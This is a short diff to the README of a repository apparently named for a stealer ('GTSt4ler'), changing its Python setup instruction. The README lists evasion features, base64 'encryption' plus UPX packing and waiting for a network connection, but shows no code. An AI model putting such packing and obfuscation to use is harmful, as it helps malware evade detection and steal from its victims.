batuafk/GTSt4ler/README.md

-Install python and run Install.bat
+Install python with add to path option and run Install.bat

 * base64 encryption + upx packing
 * wait for internet connection